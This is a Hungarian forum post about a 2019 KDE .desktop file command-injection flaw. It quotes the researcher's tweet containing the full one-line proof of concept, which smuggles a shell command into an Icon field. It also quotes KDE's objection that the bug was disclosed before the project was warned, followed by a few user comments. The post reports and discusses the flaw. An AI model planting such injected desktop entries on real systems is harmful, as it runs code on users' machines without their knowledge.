A demó belefér egy tweetbe is:
KDE 4/5 KDesktopFile (.desktop) Command Injection.
Fits in a tweet.
[Desktop Entry]
Icon[$e]=$(echo${IFS}0>~/Desktop/zero.lol&)https://t.co/Iy3UPrSuhE#redteam #0day #security #bugbounty #bugbountytip #bugbountytips #kde #rce #zerodotlol #zerolol pic.twitter.com/QRtX9Kwd1w— Dominik (@zer0pwn) 2019. augusztus 5.
A KDE közösség nem boldog:
The researcher who found it made it public before advising us. He even showed how to exploit the bug. This gives potential attackers a headstart over our own security experts. Our priority is to keep users safe by warning them of the flaw while our people develop the solution.
— KDE Community (@kdecommunity) 2019. augusztus 6.
- A hozzászóláshoz be kell jelentkezni
Hozzászólások
... és egy _ilyen_ hiba után még a community twitternek áll feljebb...!
- A hozzászóláshoz be kell jelentkezni
Megírhatná az Index is, hogy "azonnal törölje a KDE-t", ahogy a VLC-nél is beszopták a dezinformációkat
--
arch,ubuntu,windows,android
zbook/elitebook/rpi3/motog4_athene
- A hozzászóláshoz be kell jelentkezni
Valószínűleg VLC-t nagyságrendekkel többen használnak, mint KDE-t.
-----
„Egy jó kapcsolatban a társunkat az ő dolgában kell támogatni, nem a miénkben.”
rand() a lelke mindennek! :)
Szerinted…
- A hozzászóláshoz be kell jelentkezni